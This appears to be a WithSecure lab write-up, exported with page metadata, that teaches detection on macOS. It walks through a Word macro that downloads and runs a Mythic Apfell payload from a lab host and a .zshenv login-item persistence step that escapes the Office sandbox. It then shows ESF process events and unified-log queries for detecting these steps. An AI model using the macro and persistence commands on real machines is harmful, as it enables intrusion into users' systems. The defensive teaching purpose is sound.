{"id":10501,"date":"2021-04-14T09:00:00","date_gmt":"2021-04-14T08:00:00","guid":{"rendered":"https:\/\/www.withsecure.com\/resources-hub\/w-labs\/attack-detection-fundamentals-2021-macos-lab-1\/"},"modified":"2026-05-25T10:20:09","modified_gmt":"2026-05-25T09:20:09","slug":"attack-detection-fundamentals-2021-macos-lab-1","status":"publish","type":"lab_item","link":"https:\/\/www.withsecure.com\/fr\/ressources\/w-labs\/attack-detection-fundamentals-2021-macos-lab-1\/","title":{"rendered":"Attack Detection Fundamentals 2021: macOS &#8211; Lab #1"},"content":{"rendered":"<section\n    class=\"wp-block-one-column-block edwp-block js-wp-block-one-column-block wp-block-one-column-block--content-1 wp-block-one-column-block--meta-sharing layout--spacing-xxxxl-top layout--spacing-xl-bottom\"\n    >\n    <div class=\"wp-block-one-column-block__container\">\n                                                                                                                            <div class='wp-block-one-column-block__meta-sharing-grid'><div class=\"wp-component-content wp-component-content--default wp-block-one-column-block__content fade-in\">\n            <h1 class=\"wp-component-heading text--h2 wp-component-content__title\">\n    Attack Detection Fundamentals 2021: macOS &#8211; <span class=\"blue-text\">Lab #1<\/span><\/h1>                    <div class=\"wp-component-content__inner\">\n                                                    <div class=\"wp-component-content__meta\">\n                                                                            <span class=\"wp-component-content__meta-categories\">\n                                                                    <span class=\"wp-component-content__meta-category\">\n                                        Attack Detection                                    <\/span>\n                                                                    <span class=\"wp-component-content__meta-category\">\n                     
                   Endpoint Security                                    <\/span>\n                                                                    <span class=\"wp-component-content__meta-category\">\n                                        Software Protection                                    <\/span>\n                                                            <\/span>\n                                                                                                    <span class=\"wp-component-content__meta-date\">\n                                14 avril, 2021                            <\/span>\n                                                                    <\/div>\n                                            <\/div>\n                <\/div><section\n    class=\"wp-block-sharing-icons edwp-block wp-block-sharing-icons--disable-border wp-block-sharing-icons--content-1 wp-block-sharing-icons--disable-container wp-block-one-column-block__sharing fade-in wp-block-one-column-block__sharing fade-in\"\n    >\n    <div class=\"wp-block-sharing-icons__container\">\n        <div class=\"wp-block-sharing-icons__inner\">\n                            <p class=\"wp-block-sharing-icons__title fade-in\">\n                    Partager cette information                <\/p>\n                        <div class=\"wp-component-socials wp-component-socials--dark-mode\">\n    \n            <a href=\"https:\/\/www.linkedin.com\/shareArticle?mini=true&#038;url=https:\/\/www.withsecure.com\/fr\/ressources\/w-labs\/attack-detection-fundamentals-2021-macos-lab-1\/&#038;title=Attack%20Detection%20Fundamentals%202021:%20macOS%20&#8211;%20Lab%20#1\" target=\"_blank\" rel=\"noreferer noopener\" class=\"wp-component-socials__link\" title=\"Partager sur LinkedIn\">\n            <svg class='edwp-icon edwp-icon--xlg js-icon ' aria-hidden='true'>\n                <use xlink:href='#linkedin'><\/use>\n            <\/svg>        <\/a>\n    \n            <a 
href=\"http:\/\/x.com\/share?text=Attack Detection Fundamentals 2021: macOS &#8211; Lab #1&#038;url=https:\/\/www.withsecure.com\/fr\/ressources\/w-labs\/attack-detection-fundamentals-2021-macos-lab-1\/\" target=\"_blank\" rel=\"noreferer noopener\" class=\"wp-component-socials__link wp-component-socials__link--twitter\" title=\"Partager sur X (Twitter)\">\n            <svg class='edwp-icon edwp-icon--xlg js-icon ' aria-hidden='true'>\n                <use xlink:href='#x'><\/use>\n            <\/svg>        <\/a>\n    \n    \n    <\/div>\n        <\/div>\n    <\/div>\n<\/section>\n<\/div>                                                                                <\/div>\n<\/section>\n\n\n<section\n    class=\"wp-block-one-column-block edwp-block js-wp-block-one-column-block wp-block-one-column-block--content-1 layout--spacing-xxxl-bottom\"\n    >\n    <div class=\"wp-block-one-column-block__container\">\n                                                                                                                                    <div class=\"wp-component-image__wrapper wp-block-one-column-block__image fade-in\">\n                    <figure class=\"wp-component-image__figure\">\n                                            <img loading=\"lazy\" decoding=\"async\" width=\"1200\" height=\"800\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_news.jpg.webp\" class=\"wp-component-image\n                            wp-component-image--desktop\n                            wp-component-image--mobile\n                            wp-component-image--ratio-content-25-1 wp-component-image--fit-cover\" alt=\"\" srcset=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_news.jpg.webp 1200w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_news-300x200.jpg.webp 300w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_news-1024x683.jpg.webp 1024w, 
https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_news-768x512.jpg.webp 768w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_news-447x298.jpg.webp 447w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_news-219x146.jpg.webp 219w\" sizes=\"auto, (max-width: 1200px) 100vw, 1200px\" \/>                                                    <\/figure>\n                    <\/div>\n                                                                                <\/div>\n<\/section>\n\n\n<section\n    class=\"wp-block-two-column-block edwp-block js-wp-block-two-column-block wp-block-two-column-block--content-1 wp-block-two-column-block__left--align-y-top wp-block-two-column-block__right--align-y-top wp-block-two-column-block--split-sidebar layout--none-top layout--spacing-xxxl-bottom\"\n    data-block-id=\"block_8deec2adbc7aaf4dfa3c6b658d5c1860\"\n    >\n    <div class=\"wp-block-two-column-block__container row-load\">\n                                                        <div class=\"wp-block-two-column-block__left\">\n                                    <div class=\"wp-component-authors-list wp-block-two-column-block__authors\">\n                    <p class=\"wp-component-authors-list__title\">\n                Authors            <\/p>\n        \n        <div class=\"wp-component-authors-list__items\">\n                                                <div class=\"wp-component-author-card \">\n    <div class=\"wp-component-author-card__media\">\n                    <span class=\"wp-component-author-card__photo-placeholder\" aria-hidden=\"true\">\n                <svg viewBox=\"0 0 64 64\" role=\"presentation\" focusable=\"false\">\n                    <path d=\"M32 34c-8.1 0-14.7 6.6-14.7 14.7v3.5h29.4v-3.5C46.7 40.6 40.1 34 32 34z\"><\/path>\n                    <path d=\"M32 31.2c6 0 10.9-4.9 10.9-10.9S38 9.4 32 9.4s-10.9 4.9-10.9 10.9S26 31.2 32 31.2z\"><\/path>\n                <\/svg>\n           
 <\/span>\n            <\/div>\n    <div class=\"wp-component-author-card__content\">\n                    <h3 class=\"wp-component-author-card__name\">Calum Hall<\/h3>\n        \n                \n            <\/div>\n\n<\/div>\n\n                                                                <div class=\"wp-component-author-card \">\n    <div class=\"wp-component-author-card__media\">\n                    <span class=\"wp-component-author-card__photo-placeholder\" aria-hidden=\"true\">\n                <svg viewBox=\"0 0 64 64\" role=\"presentation\" focusable=\"false\">\n                    <path d=\"M32 34c-8.1 0-14.7 6.6-14.7 14.7v3.5h29.4v-3.5C46.7 40.6 40.1 34 32 34z\"><\/path>\n                    <path d=\"M32 31.2c6 0 10.9-4.9 10.9-10.9S38 9.4 32 9.4s-10.9 4.9-10.9 10.9S26 31.2 32 31.2z\"><\/path>\n                <\/svg>\n            <\/span>\n            <\/div>\n    <div class=\"wp-component-author-card__content\">\n                    <h3 class=\"wp-component-author-card__name\">Luke Roberts<\/h3>\n        \n                \n            <\/div>\n\n<\/div>\n\n                                    <\/div>\n\n            <\/div>\n<nav\n    class=\"wp-component-content-navigation wp-block-two-column-block__content-nav js-content-navigation\"\n    data-bem-base=\"wp-component-content-navigation\"\n    data-nav-column=\"left\"\n    data-nav-type=\"auto\"\n>\n            <p class=\"wp-component-content-navigation__title\">\n            Content        <\/p>\n    \n    <div class=\"wp-component-content-navigation__mobile\">\n        <label class=\"wp-component-content-navigation__mobile-label\">\n            <span class=\"wp-component-content-navigation__mobile-label-text\">\n                Navigation dans le contenu            <\/span>\n            <select class=\"wp-component-content-navigation__select js-content-navigation-select\">\n                <option value=\"\">\n                    S\u00e9lectionnez une section                <\/option>\n           
                 <\/select>\n        <\/label>\n    <\/div>\n\n    <div class=\"wp-component-content-navigation__desktop\">\n        <div class=\"wp-component-content-navigation__list-wrapper\">\n            <span\n                class=\"wp-component-content-navigation__indicator js-content-navigation-indicator\"\n                aria-hidden=\"true\"\n            ><\/span>\n            <ul class=\"wp-component-content-navigation__list js-content-navigation-list\">\n                            <\/ul>\n        <\/div>\n    <\/div>\n<\/nav>\n<section\n    class=\"wp-block-sharing-icons edwp-block wp-block-sharing-icons--disable-border wp-block-sharing-icons--disable-container wp-block-two-column-block__share wp-block-two-column-block__hide-mobile wp-block-two-column-block__share wp-block-two-column-block__hide-mobile\"\n    >\n    <div class=\"wp-block-sharing-icons__container\">\n        <div class=\"wp-block-sharing-icons__inner\">\n                            <p class=\"wp-block-sharing-icons__title fade-in\">\n                    Share this story                <\/p>\n                        <div class=\"wp-component-socials wp-component-socials--dark-mode\">\n    \n            <a href=\"https:\/\/www.linkedin.com\/shareArticle?mini=true&#038;url=https:\/\/www.withsecure.com\/fr\/ressources\/w-labs\/attack-detection-fundamentals-2021-macos-lab-1\/&#038;title=Attack%20Detection%20Fundamentals%202021:%20macOS%20&#8211;%20Lab%20#1\" target=\"_blank\" rel=\"noreferer noopener\" class=\"wp-component-socials__link\" title=\"Partager sur LinkedIn\">\n            <svg class='edwp-icon edwp-icon--xlg js-icon ' aria-hidden='true'>\n                <use xlink:href='#linkedin'><\/use>\n            <\/svg>        <\/a>\n    \n            <a href=\"http:\/\/x.com\/share?text=Attack Detection Fundamentals 2021: macOS &#8211; Lab #1&#038;url=https:\/\/www.withsecure.com\/fr\/ressources\/w-labs\/attack-detection-fundamentals-2021-macos-lab-1\/\" target=\"_blank\" rel=\"noreferer 
noopener\" class=\"wp-component-socials__link wp-component-socials__link--twitter\" title=\"Partager sur X (Twitter)\">\n            <svg class='edwp-icon edwp-icon--xlg js-icon ' aria-hidden='true'>\n                <use xlink:href='#x'><\/use>\n            <\/svg>        <\/a>\n    \n    \n    <\/div>\n        <\/div>\n    <\/div>\n<\/section>\n                <\/div>\n                                                <div class=\"wp-block-two-column-block__right\">\n                                <div class=\"wp-component-paragraph wp-block-two-column-block__paragraph \">\n    <p>Following on from the previous workshops we&#x27;ve delivered as part of WithSecure Consulting&#x27;s Attack Detection Fundamentals series, this workshop is going to delve into a topic far less discussed within the security world &#8211; detection on macOS.<\/p>\n<p>Over the three labs we have set out for this workshop, we&#x27;re aiming to develop an initial level of understanding for some of the attacks we see against macOS and most importantly how we can implement appropriate detections. The labs for this workshop are comprised of the following key areas:<\/p>\n<ul>\n<li>Initial access via Office Macros (inc. 
sandbox breakout)<\/li>\n<li>Persistence using LaunchAgents<\/li>\n<li>TCC bypass<\/li>\n<\/ul>\n<p>This workshop is not intended to cover all of the impressive macOS attacks we&#x27;ve seen in the wild, but rather to aid in developing macOS detection capability.<\/p>\n<p>A recording of this workshop series can be found <a href=\"https:\/\/www.youtube.com\/watch?v=A6rSlavcF4Q\" target=\"_blank\" rel=\"noopener\">here<\/a> and the slides are available <a href=\"https:\/\/www.f-secure.com\/content\/dam\/f-secure\/en\/consulting\/events\/collaterals\/digital\/f-secure_attack-detection-fundamentals-workshop-2-macos_2021-04-14.pdf\" target=\"_blank\" rel=\"noopener\">here<\/a>.<\/p>\n<p>Before we begin this series, it is wise to acknowledge that throughout this workshop we have employed a lot of open source tools to gather the required telemetry. A number of these are not designed to be deployed at scale, but rather to simply demonstrate the telemetry that is available on macOS and that should be gathered by your EDR solution.<\/p>\n<p>So to kick things off let&#x27;s dive right into our first lab.<\/p>\n<h2>Environment Setup<\/h2>\n<p>The vectors used to achieve a foothold on macOS devices are no different from those of other major operating systems. Phishing is arguably the most effective means of gaining access to a device, with common payload types such as:<\/p>\n<ul>\n<li>Installation packages<\/li>\n<li>Mobile profile configurations (.profile files)<\/li>\n<li>Office macros<\/li>\n<\/ul>\n<p>During this workshop we will be utilising Cody Thomas&#x27;s (@its_a_feature_) Mythic post-exploitation framework. Formerly known as Apfell, Mythic has been developed by Cody Thomas and his colleagues at SpecterOps as an excellent red teaming framework that works cross platform. 
For the purpose of this workshop we will be solely using the framework&#x27;s Apfell payloads.<\/p>\n<p>Upon following the framework installation guidance provided (<a href=\"https:\/\/docs.mythic-c2.net\/\" target=\"_blank\" rel=\"noopener\">https:\/\/docs.mythic-c2.net<\/a>) we are going to begin creating target payloads. Within Mythic select the &#x27;Create Components&#x27; tab at the top of the screen and select &#x27;Create Payload&#x27;. Next select the macOS operating system and choose the HTTP (apfell, poseidon) payload type. For simplicity within this workshop we will keep the majority of payload values at their defaults; however, it is important to change the &#x27;Callback Host&#x27; to the location of your Apfell server (assuming no redirectors are being used).<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/workshop1-1.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>Next we will select the apfell payload and provide a description that will be unique to this initial payload. For the purpose of this workshop we will select all commands to be included within the payload.<\/p>\n<p>Now that we are all set, let&#x27;s begin using this payload.<\/p>\n<h2>Generating an Office Macro<\/h2>\n<p>Now that we have generated an apfell payload we are going to generate a Microsoft Word document that contains a macro designed to download and execute a payload. 
Firstly, open Microsoft Word and create a new document, then select macros from the &#x27;Tools&#x27; dropdown menu:<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/workshop1-2.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>To generate the required macro you can use Cedric Owens&#x27; (@cedowens) Mythic Macro Generator tool (<a href=\"https:\/\/github.com\/cedowens\/Mythic-Macro-Generator\" target=\"_blank\" rel=\"noopener\">https:\/\/github.com\/cedowens\/Mythic-Macro-Generator<\/a>), which generates a fairly simple Macro resembling the following:<\/p>\n<pre><code class=\"language-bash\">Sub AutoOpen()\nMacScript(&quot;do shell script &quot;&quot;curl http:\/\/192.168.54.4:8000\/apfell.js -o app.js&quot;&quot; &quot;)\nMacScript(&quot;do shell script &quot;&quot;chmod +x app.js&quot;&quot;&quot;)\nMacScript(&quot;do shell script &quot;&quot;osascript app.js &amp;&quot;&quot;&quot;)\nEnd Sub<\/code><\/pre>\n<p>Notice that this macro is downloading the apfell.js payload from a remote location. This is necessary for the apfell.js payload to execute properly. 
To host this payload remotely, you can use something like a Python web server using &#x27;python -m SimpleHTTPServer &lt;port number&gt;&#x27; whilst in a directory containing the payload.<\/p>\n<p>Once you are hosting the payload within an accessible location, add the macro to the word document like so:<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/workshop1-3.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>Upon saving this document we are able to send off our first initial access payload.<\/p>\n<h2>Execution<\/h2>\n<p>Assuming we are able to coerce our target into opening the macro-enabled document and bypassing Microsoft&#x27;s security warnings, we can see that a new callback has been detected within Mythic:<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/workshop1-4.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>At this point we have gained an initial foothold and we can begin interacting with the compromised system. 
For example, listing the current directory (In our case, &quot;\/Users\/calumhall\/Library\/Containers\/com.microsoft.Word\/Data&quot;) we see our app.js payload:<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/workshop1-5.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>However, notice that attempting to perform simple tasks, such as creating a file within the \/tmp\/ directory, returns an &quot;Operation not permitted&quot; error:<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/workshop1-6.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>This behaviour is a result of Apple&#x27;s sandboxing capability (<a href=\"https:\/\/developer.apple.com\/documentation\/security\/app_sandbox\" target=\"_blank\" rel=\"noopener\">https:\/\/developer.apple.com\/documentation\/security\/app_sandbox<\/a>). This security control was introduced to the macOS ecosystem in an attempt to reduce the impact of a given application being compromised. As you might imagine, this situation is not ideal for an attacker, but makes life far easier for defenders!<\/p>\n<p>While the sandbox inevitably makes things harder for attackers, it does not remove the threat entirely, as there are still a number of paths that may be traversed. In this workshop we will utilise Apfell&#x27;s persist_loginitem_allusers functionality to gain persistence on the device. Login items have been exploited in the past by malware such as <a href=\"https:\/\/archive.f-secure.com\/weblog\/archives\/00002554.html\" target=\"_blank\" rel=\"noopener\">OSX.KitM<\/a> that was designed to take periodic screenshots of compromised devices.<\/p>\n<p>For the purpose of this workshop, we will assume users are running the latest version of macOS, and hence we know that the default shell is zsh. 
We can use this knowledge to create a login item that distributes a zsh environment profile that will call the &quot;app.js&quot; payload that our malicious macro dropped into the below location:<\/p>\n<ul>\n<li>\/Users\/calumhall\/Library\/Containers\/com.microsoft.Word\/Data\/app.js<\/li>\n<\/ul>\n<p>Firstly let&#x27;s create the .zshenv file on our Mythic server, the contents should include the following where &lt;current user&gt; is the user account we have compromised:<\/p>\n<pre><code class=\"language-bash\">echo \u201czsh profile error report\u201d &gt; \/tmp\/~\\\\$zshprofileerror.txt\nnohup \/usr\/bin\/osascript \/Users\/&lt;current user&gt;\/Library\/Containers\/com.microsoft.Word\/Data\/app.js &amp;<\/code><\/pre>\n<p>We must then compress this environment into a zip file:<\/p>\n<ul>\n<li>zip -r zshenv.zip .zshenv<\/li>\n<\/ul>\n<p>A zip file is used, as the macOS device will use its default file-handling functionality to unpack the &quot;.zshenv&quot; file once dropped to disk. We will now use Mythic&#x27;s upload functionality to upload this zip file to the target device:<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/workshop1-7.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>Notice that the remote_path variable has been prepended with &quot;~$&quot; &#8211; this is necessary to be able to write files from within the sandboxed environment. 
We can now trigger the persist_loginitem_allusers function within Mythic:<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/workshop1-8.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>Given these commands have worked you will see the following output:<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/workshop1-9.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>We can verify this login item has been created on the device by visiting System Preferences \u2192 Users &amp; Groups:<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/workshop1-10.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>Where you can see the file &quot;loginitem_persist&quot; has been set as a login item.<\/p>\n<p>As we can see on the Mythic server, when the target user logs into their account a new session is returned from target device:<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/workshop1-11.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>Most importantly this session is no longer contained within the macOS sandbox, and hence we are far less limited in our capability:<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/workshop1-12.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<h2>Detection<\/h2>\n<p>For the purpose of detecting these attacks, we are largely going to be relying on two core Apple logging functions: the Unified Log and the Endpoint Security Framework (ESF). 
Throughout the attack outlined above, there are numerous opportunities for detection; given the focus of this initial lab, we are going to discuss identifying the following stages:<\/p>\n<ul>\n<li>Malicious process trees<\/li>\n<li>Sandbox breakout attempts<\/li>\n<\/ul>\n<h3>Malicious Process Trees<\/h3>\n<p>To monitor process activity within macOS we can utilise the ESF to gain information about new process events. Using a tool such as Objective-See&#x27;s <a href=\"https:\/\/objective-see.com\/products\/utilities.html#ProcessMonitor\" target=\"_blank\" rel=\"noopener\">ProcessMonitor<\/a> we can investigate the process activity that takes place when our malicious document is opened:<\/p>\n<pre><code class=\"language-bash\">&gt; sudo .\/ProcessMonitor.app\/Contents\/MacOS\/ProcessMonitor -pretty\n\n[...redacted...]\n{\n&quot;event&quot;: &quot;ES_EVENT_TYPE_NOTIFY_FORK&quot;,\n&quot;process&quot;: {\n&quot;signing info (computed)&quot;: {\n&quot;teamID&quot;: &quot;UBF8T346G9&quot;,\n&quot;signatureID&quot;: &quot;com.microsoft.Word&quot;,\n&quot;signatureStatus&quot;: 0,\n&quot;signatureSigner&quot;: &quot;App Store&quot;,\n&quot;signatureAuthorities&quot;: [\n&quot;Apple Mac OS Application Signing&quot;,\n&quot;Apple Worldwide Developer Relations Certification Authority&quot;,\n&quot;Apple Root CA&quot;\n]\n},\n&quot;uid&quot;: 501,\n&quot;arguments&quot;: [],\n&quot;ppid&quot;: 16455,\n&quot;ancestors&quot;: [\n16455,\n1\n],\n&quot;rpid&quot;: 16455,\n&quot;architecture&quot;: &quot;unknown&quot;,\n&quot;path&quot;: &quot;\/Applications\/Microsoft Word.app\/Contents\/MacOS\/Microsoft Word&quot;,\n&quot;signing info (reported)&quot;: {\n&quot;teamID&quot;: &quot;UBF8T346G9&quot;,\n&quot;csFlags&quot;: 570508033,\n&quot;signingID&quot;: &quot;com.microsoft.Word&quot;,\n&quot;platformBinary&quot;: 0,\n&quot;cdHash&quot;: &quot;A9DD8BB4E781CD181E47F446E7092BC28C534626&quot;\n},\n&quot;name&quot;: &quot;Microsoft Word&quot;,\n&quot;pid&quot;: 
16463\n},\n&quot;timestamp&quot;: &quot;2021-04-09 10:10:31 +0000&quot;\n}<\/code><\/pre>\n<p>The ESF generates an event revealing that Microsoft Word has forked another process, something that does not resemble legitimate application behaviour. This is the key area of detection that we are going to focus on for the purpose of this workshop. However, should we wish to gather more information we can see the full chain of events that occur due to our Office macro from ESF events, such as the execution of our malicious payload:<\/p>\n<pre><code class=\"language-bash\">&gt; sudo .\/ProcessMonitor.app\/Contents\/MacOS\/ProcessMonitor -pretty\n\n[...redacted...]\n{\n&quot;event&quot;: &quot;ES_EVENT_TYPE_NOTIFY_EXEC&quot;,\n&quot;process&quot;: {\n&quot;signing info (computed)&quot;: {\n&quot;signatureID&quot;: &quot;com.apple.sh&quot;,\n&quot;signatureStatus&quot;: 0,\n&quot;signatureSigner&quot;: &quot;Apple&quot;,\n&quot;signatureAuthorities&quot;: [\n&quot;Software Signing&quot;,\n&quot;Apple Code Signing Certification Authority&quot;,\n&quot;Apple Root CA&quot;\n]\n},\n&quot;uid&quot;: 501,\n&quot;arguments&quot;: [\n&quot;sh&quot;,\n&quot;-c&quot;,\n&quot;osascript app.js &amp;&quot;\n],\n&quot;ppid&quot;: 16455,\n&quot;ancestors&quot;: [\n16455,\n1\n],\n&quot;rpid&quot;: 16455,\n&quot;architecture&quot;: &quot;unknown&quot;,\n&quot;path&quot;: &quot;\/bin\/sh&quot;,\n&quot;signing info (reported)&quot;: {\n&quot;teamID&quot;: &quot;&quot;,\n&quot;csFlags&quot;: 570522385,\n&quot;signingID&quot;: &quot;com.apple.sh&quot;,\n&quot;platformBinary&quot;: 1,\n&quot;cdHash&quot;: &quot;66A2F84953DF3125477BD8498E6767F0F9BCCCE1&quot;\n},\n&quot;name&quot;: &quot;sh&quot;,\n&quot;pid&quot;: 16463\n},\n&quot;timestamp&quot;: &quot;2021-04-09 10:10:38 +0000&quot;\n}<\/code><\/pre>\n<p>For detecting malicious process trees we&#x27;d definitely recommend checking out Jaron Bradley&#x27;s tool &#8211; <a href=\"https:\/\/themittenmac.com\/tools\/\" target=\"_blank\" 
rel=\"noopener\">TrueTree<\/a>. This has recently been adapted for Big Sur and now provides some awesome visibility into macOS process trees. For example, with our Apfell payload active, we can observe the osascript process that has spawned from Microsoft Word:<\/p>\n<pre><code class=\"language-bash\">&gt; sudo .\/TrueTree-3\n\n[...redacted...]\n\/System\/Library\/LaunchAgents\/com.apple.Finder.plist\n\/System\/Library\/CoreServices\/Finder.app\/Contents\/MacOS\/Finder 408\n\/Applications\/Microsoft Word.app\/Contents\/MacOS\/Microsoft Word 16455\n\/usr\/bin\/osascript 16464<\/code><\/pre>\n<p>Using the ESF we are able to detect the malicious process activity as we have discussed above. Whilst this workshop has used Objective-See&#x27;s ProcessMonitor to demonstrate this, any EDR solution that utilises the ESF should be able to gather the same telemetry.<\/p>\n<h3>Sandbox Breakout Attempt<\/h3>\n<p>While potentially difficult to utilise, the unified log contains a wealth of information regarding activity on macOS devices. Here we can see that the unified log has recorded an operation that was denied by Apple&#x27;s sandbox, i.e. our &quot;touch \/tmp\/test&quot; command.<\/p>\n<pre><code class=\"language-bash\">\u276f log stream --predicate &#x27;senderImagePath contains &quot;Sandbox&quot; &amp;&amp; eventMessage contains &quot;deny&quot; &amp;&amp; messageType == 16&#x27;\n\nFiltering the log data using &quot;senderImagePath CONTAINS &quot;Sandbox&quot; AND composedMessage CONTAINS &quot;deny&quot; AND logType == 16&quot;\nTimestamp Thread Type Activity PID TTL\n2021-03-08 20:36:54.692747+0000 0x4fa7e0 Error 0x0 0 0 kernel: (Sandbox) Sandbox: touch(67670) deny(1) file-write-create \/private\/t<\/code><\/pre>\n<p>Whilst this telemetry can be incredibly valuable, it should be noted that this set of predicates is likely to produce some noise from legitimate Apple components. 
As such, further predicates may be required to reduce this noise. For those that haven&#x27;t worked with them before, predicates are the conditions you can apply to filter the large quantities of events held within the Unified Log.<\/p>\n<h2>Conclusion<\/h2>\n<p>To summarise, from the offensive perspective it&#x27;s refreshing (or perhaps concerning) to see that Office Macros are still an issue even on Apple devices. We have demonstrated that whilst a hurdle, the Apple sandbox does not impose too much of a challenge for offensive operators, and that it should not be relied upon as a security control in this instance.<\/p>\n<p>More importantly however, we&#x27;ve revealed that attacks of this nature can be detected with a reasonable degree of confidence! With the telemetry gathered by the ESF, not only can we detect the initial events that arouse suspicion, but we can also delve further into analysing the behaviour of the malicious payload. 
It is entirely reasonable to develop these detections further by looking for behaviour such as alerting on certain osascript usage, however it is important to avoid alert fatigue depending on the behaviour of your legitimate users.<\/p>\n<h3>References<\/h3>\n<p>Special shoutout to the following researchers whose work has formed the basis of this workshop series:<\/p>\n<ul>\n<li>Patrick Wardle<\/li>\n<li>Cody Thomas<\/li>\n<li>Michael Jack<\/li>\n<li>Cedric Owens<\/li>\n<li>Csaba Fitzl<\/li>\n<li>Jaron Bradley<\/li>\n<li>Guillaume Ross<\/li>\n<li>Howard Oakley<\/li>\n<li>Phil Stokes<\/li>\n<li>Madhav Bhatt<\/li>\n<li>Adam Chester<\/li>\n<\/ul>\n<p>And to anyone else that we have inevitably forgotten to mention.<\/p>\n<\/div>\n<section\n    class=\"wp-block-sharing-icons edwp-block wp-block-sharing-icons--disable-border wp-block-sharing-icons--disable-container wp-block-two-column-block__share wp-block-two-column-block__mobile-after-right wp-block-two-column-block__share wp-block-two-column-block__mobile-after-right\"\n    >\n    <div class=\"wp-block-sharing-icons__container\">\n        <div class=\"wp-block-sharing-icons__inner\">\n                            <p class=\"wp-block-sharing-icons__title fade-in\">\n                    Share this story                <\/p>\n                        <div class=\"wp-component-socials wp-component-socials--dark-mode\">\n    \n            <a href=\"https:\/\/www.linkedin.com\/shareArticle?mini=true&#038;url=https:\/\/www.withsecure.com\/fr\/ressources\/w-labs\/attack-detection-fundamentals-2021-macos-lab-1\/&#038;title=Attack%20Detection%20Fundamentals%202021:%20macOS%20&#8211;%20Lab%20#1\" target=\"_blank\" rel=\"noreferer noopener\" class=\"wp-component-socials__link\" title=\"Partager sur LinkedIn\">\n            <svg class='edwp-icon edwp-icon--xlg js-icon ' aria-hidden='true'>\n                <use xlink:href='#linkedin'><\/use>\n            <\/svg>        <\/a>\n    \n            <a 
    <\/div>\n                                    <\/div>\n<\/section>\n","protected":false},"excerpt":{"rendered":"<p>Over the three labs we have set out for this workshop, we&rsquo;re aiming to develop an initial level of understanding for some of the attacks we see against macOS and most importantly how we can implement appropriate detections. The labs for this workshop are comprised of the following key areas:<\/p>\n","protected":false},"author":3,"featured_media":0,"template":"","categories":[306,328,307],"labs_content_type":[309],"class_list":["post-10501","lab_item","type-lab_item","status-publish","hentry","category-attack-detection","category-endpoint-security","category-software-protection"],"acf":[],"card":"<div class=\"wp-component-card-insight js-card-link wp-component-card-insight--highlighted\">\n    <div class=\"wp-component-card-insight__image-wrapper\">\n        <img width=\"618\" height=\"440\" src=\"https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/placeholder.jpg\" class=\"wp-component-card-insight__image\" alt=\"\" decoding=\"async\" loading=\"lazy\" srcset=\"https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/placeholder.jpg 618w, https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/placeholder-300x214.jpg 300w, https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/placeholder-447x318.jpg 447w, https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/placeholder-205x146.jpg 205w\" sizes=\"auto, (max-width: 618px) 100vw, 618px\" \/>                    <p class=\"wp-component-card-insight__content-type\">W\/Labs<\/p>\n            <\/div>\n    <div class=\"wp-component-card-insight__content\">\n                    <div class=\"wp-component-card-insight__meta\">\n                <div class=\"wp-component-card-insight__categories\">\n                                            <span class=\"wp-component-card-insight__category\">Attack Detection<\/span>\n                                            <span 
